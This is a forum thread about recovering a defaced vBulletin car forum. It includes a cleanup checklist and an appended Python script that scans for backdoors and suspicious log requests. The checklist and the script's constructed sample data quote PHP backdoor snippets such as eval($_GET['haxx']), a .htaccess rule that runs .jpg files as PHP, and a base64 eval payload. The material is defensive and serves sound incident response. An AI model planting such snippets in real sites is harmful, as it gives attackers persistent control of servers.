
Web page hacked. See if you can help?

Joshsevo

Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 2:20 pm

Web page hacked. See if you can help?

So many of you know who I am, but what you don't know is that I am a moderator on another forum that deals with my hobby outside of work. It's a car forum my friend set up for people like myself who own a specific type of car (Mitsubishi Evolutions, also called Evos).

Recently the site was hacked by a Sudan Security Team, and my friend is having a hard time getting the site back under his control. The company that owns the vBulletin has a backup, but it is of the pirated version that you see here.

The site's address is Coloradoevo.com.

So is there anything that any of you can suggest or do for us? There are around 400 members, and this site has been a great place for us to get together and talk about topics regarding our cars. If anyone could help, please let me know.
Security+, Network+, C|EH, CHFI, CPT
millwalll

Post Mon Dec 19, 2011 3:43 pm

Re: Web page hacked. See if you can help?

Who hosts the site? Do they have any logs? I would get the backup and take a look at what they changed. Is it just the main page that has been defaced? The first step is trying to find out how they got in so you can fix it. They do have an email address; have you tried to contact them?
l33t5h@rk

Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 4:09 pm

Re: Web page hacked. See if you can help?

Was the database backed up?
Joshsevo

Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 4:31 pm

Re: Web page hacked. See if you can help?

The company that has the backups only has a backup of the hacked web page. So the owner is saying they may have lost everything.

I emailed the guy today and am waiting for a response. They also have a Facebook page that I may go on as well.
Security+, Network+, C|EH, CHFI, CPT
l33t5h@rk

Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 5:05 pm

Re: Web page hacked. See if you can help?

vBulletin looks like it is all DB driven. I'm thinking if you get the latest version of the software, install it, then have them restore the database, you might be out of the woods. This assumes their attack isn't on the DB tier.
l33t5h@rk

Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 5:12 pm

Re: Web page hacked. See if you can help?

I (hesitantly) went to the site, and it does look like they just defaced it instead of actually hacking the thing; likely somebody just found a leak in the vBulletin software and exploited it that way. I'd say if you can restore the database with the updated software, that's probably the most you can do for now.

FYI: this thing sadly happens a lot and is more annoying than damaging. I once had a phpBB site of mine undergo a similar treatment, and I found that the time I spent being pissed about it was significantly less than the time it took me and my hosting provider (Verio) to fix it.
Joshsevo

Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 6:27 pm

Re: Web page hacked. See if you can help?

Good heads-up. I looked into vBulletin defacing and found a few things that I sent to the owner to look into.

Also, give me an opinion on this.

I reported their Facebook account to FB, as I feel that by letting them have an FB account, FB is allowing them to run a criminal enterprise. They clearly do this for fun/money, as it's not just this web page but many others, and they have a large outreach program to get others to join their efforts. So hopefully FB will inquire why I reported them, and then I can go into further detail.

It's all about making it more difficult for the hackers to communicate with others.
Security+, Network+, C|EH, CHFI, CPT
cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Mon Dec 19, 2011 9:00 pm

Re: Web page hacked. See if you can help?

Was the box that was hosting it rooted or was the site just defaced?
Joshsevo

Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 9:56 pm

Re: Web page hacked. See if you can help?

Looks like it was just defaced. Seems the vB version my buddy is using is less secure than the most recent updates, and the version we currently have is one that everyone else stays away from.

Getting on the vBulletin site, it looks like the admins made a tool to help get rid of the defacing problems. I forwarded the link to my buddy and will let him work on it, and then I will help out where I can.
Security+, Network+, C|EH, CHFI, CPT
l33t5h@rk

Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 10:17 pm

Re: Web page hacked. See if you can help?

That's good news; have you got any info on whether or not the DB was backed up?
Joshsevo

Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Tue Dec 20, 2011 12:24 am

Re: Web page hacked. See if you can help?

According to my friend, who told me a few days ago, the DB was backed up with the defaced version. He said they back it up every month, and maybe that month ticked down, seeing as this has been like this for maybe a week or so.
Security+, Network+, C|EH, CHFI, CPT
l33t5h@rk

Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Tue Dec 20, 2011 10:15 am

Re: Web page hacked. See if you can help?

That's interesting; I figured it was just a PHP vuln that was exploited.

Best of luck
Joshsevo

Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Fri Dec 23, 2011 1:46 pm

Re: Web page hacked. See if you can help?

So my buddy has gotten into the admin panel and has removed the screen that you saw when you went to the site. He's working on it slowly, but it seems like he is getting there.
Security+, Network+, C|EH, CHFI, CPT
millwalll

Post Fri Dec 23, 2011 4:24 pm

Re: Web page hacked. See if you can help?

Cool, any news on how it was done?
MaXe

Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Mon Dec 26, 2011 5:04 pm

Re: Web page hacked. See if you can help?

Even though I thought you were using phpBB, as that was what the cached version said, if you're using vBulletin, there are a few things to check in case of compromise:
1) Go through ALL plugins; there may be new ones that contain malicious code / backdoors.
2) Scan all templates for "eval" or similar commands. A PHP backdoor in vBulletin templates often begins with { or eval( . I think in vB4 backdoors can look like this: {vb:raw eval($_GET['haxx']) } (Not 100% sure, but I've seen backdoors hidden in templates. It is _even_ possible to make a template look like it was never modified, meaning you can't assume a "red" color on a template means it was edited by a hacker.)
3) Make sure HTML is still disabled for all forum sections (this can pose a threat too).
4) Even if you have removed all backdoors from the admincp, INCLUDING the "cron" scripts, they can still be in a "cache" version of the entire site, which I've experienced. This often occurs when one performs manual edits of the database, as vBulletin seems to use the somewhat confusing "datastore" table for almost everything as well.

Okay, you've gone through templates, plugins, forum sections, cron scripts, and perhaps even the database. What now?

5) Now you look for .php files that shouldn't be there, or altered .php files that contain backdoors. Don't use the timestamps as a method of finding out whether a file was changed or not, as those can easily be tampered with as well. If the hackers weren't smart, they didn't change the timestamp to match the rest of the files. Sometimes they also set the timestamp to a random date, when you perhaps weren't even near a computer. Such files should be checked.

6) You're not done yet, as some hackers change or add .htaccess files to make other extensions, often in subdirectories, executable as PHP. Meaning if you find a .htaccess file that shouldn't be there, it could contain a "php-handler" setting saying that all .jpg files in that directory should be executed as PHP, and the actual directory could be new as well, but named something that could be a part of the original installation.

7) You've gone through almost everything, well, almost. There's also the php.ini file, where the setting auto_append_file appears to be the newest trick they're using. The setting appears to be "Off", even though it is set to "0ff" (zero f f), meaning it reads a file named "0ff" in /tmp/. Reference: http://blog.sucuri.net/2011/12/malware- ... p-ini.html

As you can see, it's often better to start with a fresh set of PHP files and delete _everything_ from the HTTP directory.

First and always, take a backup of the files, even if they're backdoored. It's a good learning experience, and it gives you insight into how the hackers work too, esp. if you study the access.logs, which are often only deletable by the root user and are somewhat often left behind and not deleted.

The access.log is huge, which is why you should always determine a point in time where the attack may have occurred. Narrowing it to a couple of hours, if possible, is best, and then you study the log, often for strange GET requests, or POST requests to files that shouldn't accept POST requests at all, which may take time as well  :)

Merry X-mas, I hope you enjoyed this info, as these are most of the tricks I've seen used  ;)
I'm an InterN0T'er
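As an added example that is not part of this thread and not vBulletin's own code, here is a small Python triage script that turns the checklist above (template eval backdoors, .htaccess handler remaps, the php.ini "0ff" trick, altered or added .php files) and millwalll's "get the logs and see what they changed" into something you can run against a copy of the web root. Everything it operates on below is constructed: the sample web root, the "clean" copy and the access.log lines are made up for the demonstration, and the function names and indicator lists are my own choices, not anything from the site in question.

```python
"""Post-compromise triage for a PHP forum install: scan a web root (and a template
export) for the backdoor tricks listed in the post above, diff the live tree against a
clean copy by content rather than mtime, and pick out suspicious access.log requests.
Added example; the web root, clean copy and log lines below are constructed."""
import hashlib
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

PHP_EXTS = ("php", "phtml")
# Execution/decoding primitives that do not belong in templates, images or .xml exports.
PHP_EXEC_RE = re.compile(r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|"
                         r"proc_open|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
SUPERGLOBAL_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
VB_TEMPLATE_RE = re.compile(r"\{vb:raw\s+eval\s*\(", re.I)   # the vB4 shape quoted in the post
HANDLER_RE = re.compile(r"^\s*(?:AddHandler|AddType|SetHandler)\s+\S*php\S*(?:\s+(.*))?$", re.I | re.M)
AUTO_FILE_RE = re.compile(r"^\s*auto_(?:append|prepend)_file\s*=\s*[\"']?([^\"'\s;]+)", re.I | re.M)
PHP_TAG_RE = re.compile(r"<\?php|<\?=", re.I)


def scan_file(path: str, text: str) -> List[Tuple[str, str]]:
    """Indicators found in one file as (path, reason); empty means 'nothing obvious', not 'clean'."""
    out = []
    name = path.rsplit("/", 1)[-1].lower()
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if name == ".htaccess":                 # point 6: other extensions mapped to the PHP handler
        for m in HANDLER_RE.finditer(text):
            out.append((path, "PHP handler for %s" % (m.group(1) or "every file").strip()))
    if name in ("php.ini", ".user.ini"):    # point 7: auto_append_file, incl. the '0ff' look-alike
        for m in AUTO_FILE_RE.finditer(text):
            hint = " (look-alike of 'Off')" if m.group(1).lower() in ("0ff", "0n") else ""
            out.append((path, "auto_*_file = %r%s" % (m.group(1), hint)))
    if ext not in PHP_EXTS and PHP_TAG_RE.search(text):
        out.append((path, "PHP open tag inside a .%s file" % ext))
    if VB_TEMPLATE_RE.search(text):        # point 2: eval smuggled into a template
        out.append((path, "vB4 {vb:raw eval(...)} template backdoor"))
    for lineno, line in enumerate(text.splitlines(), 1):
        # vBulletin itself evals compiled templates, so inside .php files only flag
        # primitives fed directly from request data; anywhere else any primitive is suspect.
        fed = SUPERGLOBAL_RE.search(line) is not None
        if PHP_EXEC_RE.search(line) and (ext not in PHP_EXTS or fed):
            out.append((path, "line %d: exec/decode primitive%s"
                        % (lineno, " fed by request data" if fed else "")))
    return out


def scan_tree(files: Dict[str, str]) -> List[Tuple[str, str]]:
    return [f for path in sorted(files) for f in scan_file(path, files[path])]


def diff_against_clean(clean: Dict[str, str], live: Dict[str, str]):
    """Point 5: compare by content hash, never by timestamp. Returns (added, modified, missing)."""
    def h(s: str) -> str:
        return hashlib.sha256(s.encode("utf-8", "surrogateescape")).hexdigest()
    added = sorted(p for p in live if p not in clean)
    modified = sorted(p for p in live if p in clean and h(live[p]) != h(clean[p]))
    missing = sorted(p for p in clean if p not in live)
    return added, modified, missing


# Apache combined log: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" \d{3}')
PAYLOAD_RE = re.compile(r"eval\(|base64_decode|gzinflate|php://|\.\./|<\?|passthru|shell_exec|system\(", re.I)


def scan_access_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Requests worth a closer look: POSTs to things that should never accept them, and
    query strings carrying code. Returns (reason, raw line)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        leaf = path.rsplit("/", 1)[-1]
        ext = leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""
        if m.group("method") == "POST" and ext and ext not in PHP_EXTS:
            hits.append(("POST to a .%s resource" % ext, line))
        if PAYLOAD_RE.search(unquote(query)):
            hits.append(("code in query string", line))
    return hits


# --- constructed sample data (not from any real site) ---------------------------------
SAMPLE_WEB_ROOT = {
    "forum/index.php": "<?php\nrequire_once('./global.php');\n",
    "forum/includes/class_core.php": (
        "<?php\n"
        "eval('$output = \"' . fetch_template('header') . '\";');\n"   # legitimate vB-style eval
        "if (isset($_POST['c'])) { eval($_POST['c']); }\n"               # appended by the attacker
    ),
    "forum/images/.htaccess": "AddHandler application/x-httpd-php .jpg\n",
    "forum/images/misc/logo.jpg": "GIF89a\n<?php eval($_GET['haxx']); ?>\n",
    "forum/php.ini": "auto_append_file = 0ff\n",
    "forum/templates_export.xml": "<template name=\"header\">{vb:raw eval($_GET['haxx']) }</template>\n",
}
CLEAN_FILES = {
    "forum/index.php": SAMPLE_WEB_ROOT["forum/index.php"],
    "forum/includes/class_core.php": "<?php\neval('$output = \"' . fetch_template('header') . '\";');\n",
}
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Dec/2011:03:14:07 -0700] "GET /forum/showthread.php?t=1234 HTTP/1.1" 200 51002 "-" "Mozilla/5.0"',
    '198.51.100.77 - - [12/Dec/2011:03:15:41 -0700] "GET /forum/faq.php?haxx=eval(base64_decode(%27cGhwaW5mbygpOw==%27)) HTTP/1.1" 200 211 "-" "-"',
    '198.51.100.77 - - [12/Dec/2011:03:16:02 -0700] "POST /forum/images/misc/logo.jpg HTTP/1.1" 200 88 "-" "-"',
]

if __name__ == "__main__":
    for path, reason in scan_tree(SAMPLE_WEB_ROOT):
        print("FILE  %-32s %s" % (path, reason))
    print("DIFF  added=%s modified=%s missing=%s" % diff_against_clean(CLEAN_FILES, SAMPLE_WEB_ROOT))
    for reason, line in scan_access_log(SAMPLE_LOG):
        print("LOG   %-32s %s" % (reason, line.split('"')[1]))
```

On a real box you would build the two dictionaries by walking the live web root and a fresh download of the same vBulletin release, and feed `scan_access_log` the lines from the time window you narrowed down; the `.jpg` POST hit and the `.htaccess` handler line together are exactly the point-6 pattern the post describes. Note that `scan_file` deliberately stays quiet about `eval(` in `.php` files unless request data is on the same line, because vBulletin's own template engine uses eval heavily and a raw grep would drown you in hits; the content diff against a clean copy is what catches the rest.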